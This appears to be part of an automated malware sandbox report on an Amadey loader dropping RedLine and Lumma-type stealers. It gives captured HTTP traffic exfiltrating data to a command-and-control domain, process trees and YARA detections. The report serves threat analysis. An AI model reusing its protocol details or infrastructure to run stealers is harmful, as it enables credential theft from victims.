2024-06-23 22:10:54 UTC	1280	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 37 36 42 32 36 41 39 36 46 35 31 30 41 35 38 41 36 36 42 45 38 43 45 35 34 38 30 35 43 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 57 57 58 4c 46 2d 2d 34 35 31 35 0d Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9376B26A96F510A58A66BE8CE54805CF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"DWWXLF--4515
2024-06-23 22:10:55 UTC	814	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8qh9408pgn1888ps8a5cu3mefh; expires=Thu, 17-Oct-2024 15:57:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hDaaRLMsQ5Hs0A3bh84tEuU%2BPuZpyVe8HqTsljMcIW8pCxAV1hEINTi4jERW5mwvJ9Iw%2BLtsQ8%2B0736dd2w%2FAqmnBEcQj0NFR3EpkJN7KL7PvRC2TAOyVoF6faUx7AucA4ph5wGO1Mjt%2FpE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cf956aa243cd-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 22:10:55 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-06-23 22:10:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.5	52929	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:56 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 315822 Host: disappointcredisotw.shop
2024-06-23 22:10:56 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 37 36 42 32 36 41 39 36 46 35 31 30 41 35 38 41 36 36 42 45 38 43 45 35 34 38 30 35 43 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 57 57 58 4c 46 2d 2d 34 35 31 35 0d Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9376B26A96F510A58A66BE8CE54805CF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"DWWXLF--4515
2024-06-23 22:10:56 UTC	15331	OUT	Data Raw: a1 eb 9d f3 d3 81 36 28 05 00 39 b8 3e 3c 0c 0d e8 b0 b4 88 81 68 42 dd 98 4e 0d b4 ed 74 03 da 3f 62 d7 8b cb ce a7 48 9f cf b8 18 6d 83 0d 08 f1 86 fa 02 58 38 5a 68 11 06 14 de 4a 17 46 d8 fe b5 fe ce c4 ed 2a a9 e3 41 30 95 25 64 30 f7 32 67 6d 3e 0b c1 4a e9 a7 38 35 e4 4e 80 fb a6 cd 40 29 0d 6a 79 c2 4d b3 9f 07 e1 04 c1 0d 7a 1e 49 9a 10 28 d6 16 15 85 62 99 2f b7 15 16 b6 4d 15 aa 79 3a 22 03 fa 46 fb ba 7b 3f 13 65 40 64 1e 51 54 6b 3f bd bf d5 92 a7 6b c6 f1 46 2c 7d 50 e9 78 e9 a4 d7 25 cc 93 f3 2e c1 be 7d b4 01 39 16 5f 8f b4 60 4d c9 3c 07 40 d7 20 73 10 a8 28 ac 49 a5 73 96 1d f8 26 7c c5 e7 9b df d1 b4 d6 32 e5 9d 46 45 f3 50 c4 57 b1 6a f3 bc b2 57 c0 d2 ab f7 fa cc 87 47 7b bd cd c7 fb 87 48 16 1e 64 a1 62 47 ed fa b8 73 4f f0 66 d8 d9 Data Ascii: 6(9><hBNt?bHmX8ZhJF*A0%d02gm>J85N@)jyMzI(b/My:"F{?e@dQTk?kF,}Px%.}9_`M<@ s(Is&\|2FEPWjWG{HdbGsOf
2024-06-23 22:10:56 UTC	15331	OUT	Data Raw: b7 02 48 ad 8a 68 77 b7 94 96 9d 47 a4 7c 8b db 88 ab 04 4c 77 72 80 02 f0 12 57 8b b7 93 fa f8 c0 c9 c9 b2 d2 59 d9 c7 86 18 77 27 77 5e ee cd 67 60 d5 aa 53 67 fd 94 41 ac 17 e0 db fe 49 e9 69 de 9d 06 de be e1 50 76 b4 c2 51 1c d7 21 c7 d3 fd 8c ab 1b 67 67 4f 89 a4 52 46 da c2 db 28 03 ac d5 e2 bb 09 51 1a ec fa 94 95 15 2b 61 e2 9b 15 da ea ca 56 5b 1c 8a 2d a8 c9 ef f0 d6 12 ac 73 f8 a5 ee 23 84 48 33 e7 75 6e a2 fe 7b 87 8c a6 c3 cd 3a 95 ec ff 7a ff a3 7e 42 d9 0f 1a a6 1d b3 46 54 02 38 77 8b f5 92 c6 33 34 e0 b5 12 2c ac bc 30 00 03 75 31 0e 07 e2 19 87 07 65 58 87 3f c4 87 ae 45 e8 6a 5e a7 d8 6d 23 3b 37 43 5e 8c c8 6b 5e 5f 3c 2a 98 ad 6b 79 c7 d8 5d 56 1b 50 d6 4e 26 0d ee 31 1f 92 18 29 dd 1e bf c5 e2 4f ed 8d 7e 2e 6d be 10 0c 38 91 99 70 Data Ascii: HhwG\|LwrWYw'w^g`SgAIiPvQ!ggORF(Q+aV[-s#H3un{:z~BFT8w34,0u1eX?Ej^m#;7C^k^_<*ky]VPN&1)O~.m8p
2024-06-23 22:10:56 UTC	15331	OUT	Data Raw: 25 e8 f2 22 41 a4 ee 1e b0 e3 2a c5 52 7f 7c 2d c0 4e 9a 83 9e e6 8c de b9 97 3d 91 48 86 c6 04 de 77 d9 1a 29 3f eb b4 41 45 20 93 c9 7b f6 ad 7d 53 df fb 84 6e 7e 63 d0 19 17 6e 5d b0 8a 40 0a 9c fe f2 8f c3 c6 40 53 68 52 2e ff d7 51 52 7f 79 29 fa 0c b4 11 70 f4 d6 14 60 39 44 de 87 22 d8 b1 70 6c 70 22 58 e5 83 27 c0 12 7f 77 9e 6d 6a 7a e7 60 c9 49 70 f2 e7 72 9f 32 45 82 62 04 bc e2 4f 00 c3 71 f3 82 28 06 f5 48 70 8b 2a e6 cb 42 6f 08 8e 41 2d 02 a9 47 7f 45 20 6b 9d a0 b2 48 84 0e d6 84 5f 9e 18 3a 6a 17 f1 a4 6c 0b bc 51 13 74 a1 84 4b 82 5e 13 c9 df 80 c4 12 21 78 0f 8b 24 32 36 80 a4 a2 15 72 6c e1 82 b7 7a 01 89 7c 5c 18 13 19 02 8e 96 d8 7c 3c e3 f4 11 78 71 81 e3 f5 bc 90 cb 20 e2 4b e0 83 8d 5f 7b b8 36 75 f1 fd 23 96 c8 3b 74 3b 96 77 48 Data Ascii: %"AR\|-N=Hw)?AE {}Sn~cn]@@ShR.QRy)p`9D"plp"X'wmjz`Ipr2EbOq(HpBoA-GE kH_:jlQtK^!x$26rlz\|\\|<xq K_{6u#;t;wH
2024-06-23 22:10:56 UTC	15331	OUT	Data Raw: c1 e4 08 e8 94 9a 92 95 0e 72 35 db 3b c3 42 cc df fe 48 78 76 11 62 4d bb 1f 40 b8 b4 b3 5f 31 35 74 76 aa 34 1b 73 92 db 65 4f 29 95 f2 9d 11 29 7c 60 b0 e9 cd 1f 11 f0 a4 db eb e7 0f c3 bc 1e d4 03 97 c0 a7 26 68 ed 54 8d 83 5c 10 5c f9 5c 52 9b 50 3a 49 fc 67 b2 f2 b5 06 06 93 24 1a 81 4b 6d 31 6a 5f 57 11 b2 d4 0f 8e 0b 1f b8 ce f1 c3 8d 03 66 80 3c 1e 34 fa 65 33 9c e4 51 e8 cb 59 82 af b0 80 1c 1a ae c5 8b fb c9 da c7 87 01 15 fd 69 64 0a 3e 0a ac ad f1 03 36 7b 1b dd 2a 6e e6 82 33 8d 0d 0c f8 4f 28 de 88 db dc 17 8e e1 dd 3a 10 31 3c d1 ea 72 b2 b3 2d e6 06 62 63 07 e0 cc 6a ba ee af 5c 55 b6 30 e0 f1 88 79 a3 ac a8 79 8c ce 1f 08 70 37 0d fd 6c 7e b2 38 1b 41 28 2d 75 66 d5 99 d0 e3 46 4c 15 ac 6d 81 60 ff f2 d4 9d af ef 6d 60 29 17 22 df 83 7a Data Ascii: r5;BHxvbM@_15tv4seO))\|`&hT\\\RP:Ig$Km1j_Wf<4e3QYid>6{*n3O(:1<r-bcj\U0yyp7l~8A(-ufFLm`m`)"z
2024-06-23 22:10:56 UTC	15331	OUT	Data Raw: 5a b4 3e c4 e7 9c a8 23 72 e4 6e d1 2b 7e 63 0d 63 ba 87 fb a4 98 3e 28 f2 7b 97 34 aa 7f fb 4b 01 ff 93 ad 5d 44 99 ef 5a ed 3d cc 89 c8 17 0a 4d 95 24 9a f0 44 66 5c c0 3e 62 9f ab af 06 9f 13 0b 1c 62 b4 14 27 39 29 29 0f dc 17 ce 95 48 35 1c 1b e2 c3 b4 0c 04 be 65 8f 99 b1 8c 75 1e 13 b3 6f 77 45 e0 c0 28 53 0b f7 24 c4 62 4a f9 34 d3 29 b9 20 47 e8 fa 74 9c 58 3f 74 7d fb fb b7 e5 df b1 58 ab f0 a0 3f 62 ff d2 1f e0 77 00 9d 0e b6 e8 96 58 90 c2 71 a0 31 c9 f0 0d b0 5a 55 f0 99 85 38 11 92 ae 2d 74 7f cf 7b d6 fa 22 00 0a 6c b8 2c e4 0a bc ed 02 46 58 0e 30 74 23 4a 42 72 3d 9c 4f 02 a6 7b de 07 f3 12 6b ae cb 29 af 39 d2 15 65 a8 db a7 14 36 e3 a1 f8 01 b9 75 1f f3 c3 fb ba b5 2b 67 2c 26 3d 25 f0 2c 3a dd 2d 32 2c a3 b9 2d d7 3e a4 a7 1a 2d 7c 7e Data Ascii: Z>#rn+~cc>({4K]DZ=M$Df\>bb'9))H5euowE(S$bJ4) GtX?t}X?bwXq1ZU8-t{"l,FX0t#JBr=O{k)9e6u+g,&=%,:-2,->-\|~
2024-06-23 22:10:56 UTC	15331	OUT	Data Raw: 8f 1a 09 b0 15 d1 b4 e1 44 bf 95 44 26 88 7d 41 cb 15 46 4c 44 0f 93 f9 7e d6 f5 db 5e f2 80 71 fe ae 57 36 1c 94 61 42 f1 31 4e 0a 80 b1 6a 70 b8 da ac 7f 7c 5b cf db 93 3a c7 74 f7 ac a0 12 94 ae 6d 67 05 92 ec 3e 12 78 93 80 46 3f 62 46 32 c8 b1 fb 76 c2 7d cf 9e 31 82 94 4f 5a 30 3a 9b 29 30 9e c8 78 7f da 88 b0 eb 1f ae f8 9a 73 93 b3 ad 1a a8 3d 4e 06 16 a8 02 dd 4d 0f 25 28 67 cb d7 3f f2 92 71 50 7c 1b a7 8f 70 ee 12 8a 15 24 aa ea 4c 63 48 88 c1 b6 ce dc 92 36 b1 0f ae 2c ed ac 72 4b a8 9f 55 b7 bb 25 48 09 73 77 f4 57 88 73 47 a1 9e be b3 79 04 7f 15 02 97 89 c3 63 77 1d 3c 30 32 5f f9 8f 1f 20 f7 d5 f6 d8 58 e0 3a b9 e6 2c d9 17 aa cc ae ac f5 14 5d 96 ed e0 fa 7b 80 15 86 3c d8 3e c1 81 3d 45 3c 8d 69 12 52 56 64 86 20 a2 78 22 d4 16 5a b6 5f Data Ascii: DD&}AFLD~^qW6aB1Njp\|[:tmg>xF?bF2v}1OZ0:)0xs=NM%(g?qP\|p$LcH6,rKU%HswWsGycw<02_ X:,]{<>=E<iRVd x"Z_
2024-06-23 22:10:56 UTC	15331	OUT	Data Raw: ba 7d 83 7d f1 a3 f8 b6 9f 1d 78 dc c1 11 5d 44 1b e7 48 5b 9b e8 b8 10 dc 17 2e 1e 2f 05 3e cc 41 1c 88 1b 2c 90 83 91 66 30 28 bc 75 c6 61 2c 29 e8 f1 50 d1 3a 3b c5 2e f7 db ab a8 6a b5 46 8b c8 c5 13 36 7b 60 61 2c 9c be 42 bd 1b 24 ca 1b e3 e3 00 1a fc 0a 74 d6 83 9b a6 ca 30 64 ff 4f c4 d8 f7 67 51 96 47 a3 77 15 cc 99 a0 52 50 71 78 1a 47 0c 22 86 fd 76 fb 71 a8 e9 2b 43 9e 55 a8 be a4 4f ed fc d3 13 66 9b 1a 10 2b 56 28 4b fc 76 61 0f e1 9e be fd cd 1f 43 48 28 e8 60 4f fe b5 46 48 41 4e 9c 6c 8c 02 fa 1e fe 78 79 e8 fd d2 a0 7d 0f 7f 5e f2 86 89 1e 2f 7c 38 2e 6c 82 1e 65 ea 93 42 82 1a 59 6c 4a 11 2d c2 22 da 7c 56 84 df 49 64 10 57 72 ef 1c 46 3b 2b fc f3 0e 7d fa ff 77 91 06 1e 6b 44 d3 a1 a5 cd 35 cd 8b c9 02 6f 06 f2 b2 70 c8 03 3b a1 8d 77 Data Ascii: }}x]DH[./>A,f0(ua,)P:;.jF6{`a,B$t0dOgQGwRPqxG"vq+CUOf+V(KvaCH(`OFHANlxy}^/\|8.leBYlJ-"\|VIdWrF;+}wkD5op;w
2024-06-23 22:10:56 UTC	15331	OUT	Data Raw: bb 0d a3 cd 1b a7 f1 94 54 c2 b5 6f 74 d4 e1 03 61 02 da 27 58 0e dc 62 ae 4d 8e ed 6c b7 2c 04 b2 1a 52 6d 29 ae 70 85 15 e8 4f 0c b2 f8 e8 cd 3a f8 21 9e 68 16 71 6f c8 ae 0d 0e 28 40 01 af 6f f9 8b 3f ce 26 9f 01 5b 64 21 af ed 4f 1b 1c 7d 17 0d c7 9f 79 44 9a dd a5 c4 9d 0f 05 7a 82 d1 7e 23 bb 63 8e bc 2a c1 41 36 21 fc 51 39 2d d2 1c bd ac 27 50 5b 0e 28 fd b3 c5 98 c8 29 1b 4b 82 3c 28 cf 49 84 bd 53 01 a9 50 4c 6b 96 22 51 07 16 6e 6e 92 e7 6f fe 43 ed eb 45 ff 33 7e 8f e5 0a 55 74 0c 32 ad 9f 02 6e f3 bc 61 9e 8f 64 98 2f 64 9f 02 47 26 ea 8e 2a 80 09 97 61 4b 29 96 86 66 6c d9 80 a3 f6 c9 cb 2e ce 47 4b f8 a4 df 75 04 3b 95 d2 93 b7 e3 3e 8a d8 e8 a7 f9 2c 3d 59 d8 0c d1 fc b0 a8 25 41 b0 6d 26 65 ae 39 9e 58 ec 66 45 54 ea db 8b 45 b3 33 c8 6f Data Ascii: Tota'XbMl,Rm)pO:!hqo(@o?&[d!O}yDz~#cA6!Q9-'P[()K<(ISPLk"QnnoCE3~Ut2nad/dG&aK)fl.GKu;>,=Y%Am&e9XfETE3o
2024-06-23 22:10:56 UTC	15331	OUT	Data Raw: f3 61 c2 5e 2d 98 21 c4 94 20 76 2f 67 a9 88 d5 49 75 23 9f 4a 99 9d 55 c2 af 8c e2 f8 2b 39 8b bd bf b9 ab c7 14 63 fd 09 c8 cc c2 94 33 3c 21 8a 97 c4 0e 7c f5 9f e7 d4 5f 19 d0 90 dc 9d d7 66 b9 2b 5f 57 9a b3 8e c0 5f 34 5b a2 ef ad 39 d7 86 b1 a3 05 e8 ff 0e 51 57 ac d6 7d 13 bb 8c 0b dd 27 1c c2 d0 54 5f 0f a5 3b b3 8e f7 2a d8 67 18 1d fd 93 ef a3 dc 44 04 db c9 6f 26 7f 9f 5b 81 d8 6c ff 2d e6 ef 84 17 00 f3 47 c7 2e 73 2e af 79 7d 6f 6a d1 fd 8d 20 02 5a 53 53 20 e3 0a cc 1e 31 d2 1a 04 fc 9d f8 97 c2 7c 0c 6c eb 2b aa 97 22 55 3c 98 f7 ff 25 2e 4a e7 72 8d 95 0e 2a 38 15 63 7c c5 08 bc fd bc 68 08 72 4f 1b 1c 62 84 30 0d 93 f5 77 96 f5 57 84 63 29 f5 29 17 3b f9 fc e1 d2 5d 8b ef 74 9a 21 f3 64 99 ba 9b 2c 25 6a 7f 96 f4 09 30 b3 24 89 45 7e 8e Data Ascii: a^-! v/gIu#JU+9c3<!\|_f+_W_4[9QW}'T_;gDo&[l-G.s.y}oj ZSS 1\|l+"U<%.Jr8c\|hrOb0wWc));]t!d,%j0$E~
2024-06-23 22:10:58 UTC	818	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l6g0t1b7mkucelb501j056hgng; expires=Thu, 17-Oct-2024 15:57:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h8ddxp0j93%2FWcqdaRsbD0lon%2FjIS1BxlNYs7H8M3XIvkEsBV1iIhO7Ty5A%2FXkF%2Fxdo0DqdGRmGSsj4G0Yq9aUiRMLNAqA4C%2Bi8FunIbccJTDWtELL%2Fvm51wlQvvy8K06P%2BMbrAoEeoCQIZ0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cf9e5acb43da-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.5	52935	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:58 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: disappointcredisotw.shop
2024-06-23 22:10:58 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 57 57 58 4c 46 2d 2d 34 35 31 35 26 6a 3d 64 65 66 61 75 6c 74 26 68 77 69 64 3d 39 33 37 36 42 32 36 41 39 36 46 35 31 30 41 35 38 41 36 36 42 45 38 43 45 35 34 38 30 35 43 46 Data Ascii: act=get_message&ver=4.0&lid=DWWXLF--4515&j=default&hwid=9376B26A96F510A58A66BE8CE54805CF
2024-06-23 22:10:59 UTC	812	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sg0lksfi1o1reidef5pfplmspa; expires=Thu, 17-Oct-2024 15:57:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EtQ2HBUg5XdcPyvF%2B4b1VWXoAPC9Bq62LEyx67AgwBm3BXJEXGy8QBXuhmcnearLYSjM1HJu0c6WqRF8XaS%2FWqo6Lh8l8o6z7%2FIjAMDyJbuk8ZZzVvh%2FFaZ4fnG90D2QejlXB137mJatrPw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cfae487c72b7-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 22:10:59 UTC	54	IN	Data Raw: 33 30 0d 0a 6b 6c 31 4b 47 64 65 31 44 6a 63 7a 6f 34 71 7a 33 2b 46 50 52 53 59 69 6d 56 47 5a 4a 37 74 33 73 33 38 72 52 7a 41 31 76 55 72 4a 41 41 3d 3d 0d 0a Data Ascii: 30kl1KGde1Djczo4qz3+FPRSYimVGZJ7t3s38rRzA1vUrJAA==
2024-06-23 22:10:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	18:09:56
Start date:	23/06/2024
Path:	C:\Users\user\Desktop\hsRju5CPK2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\hsRju5CPK2.exe"
Imagebase:	0xad0000
File size:	1'907'712 bytes
MD5 hash:	E77913DFEB423031E19ACBD2460DFFEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2055170798.0000000000AD1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2014834616.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:09:59
Start date:	23/06/2024
Path:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe"
Imagebase:	0xcf0000
File size:	1'907'712 bytes
MD5 hash:	E77913DFEB423031E19ACBD2460DFFEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2050132047.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 46%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	18:10:00
Start date:	23/06/2024
Path:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
Imagebase:	0xcf0000
File size:	1'907'712 bytes
MD5 hash:	E77913DFEB423031E19ACBD2460DFFEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2053395670.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2095100146.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:10:04
Start date:	23/06/2024
Path:	C:\Users\user\AppData\Local\Temp\1000007001\ama.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000007001\ama.exe"
Imagebase:	0x350000
File size:	304'128 bytes
MD5 hash:	5D860E52BFA60FEC84B6A46661B45246
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000000.2084249217.0000000000352000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2393678580.0000000002970000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:10:06
Start date:	23/06/2024
Path:	C:\Users\user\AppData\Local\Temp\1000035001\gold.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000035001\gold.exe"
Imagebase:	0x9e0000
File size:	535'080 bytes
MD5 hash:	70A578F7F58456E475FACD69469CF20A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 100%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:10:06
Start date:	23/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x220000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:10:07
Start date:	23/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x730000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.4488518104.0000000000421000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	18:10:08
Start date:	23/06/2024
Path:	C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe"
Imagebase:	0x5b0000
File size:	317'952 bytes
MD5 hash:	6E3D83935C7A0810F75DFA9BADC3F199
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	18:10:12
Start date:	23/06/2024
Path:	C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe"
Imagebase:	0xd0000
File size:	424'960 bytes
MD5 hash:	07101CAC5B9477BA636CD8CA7B9932CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
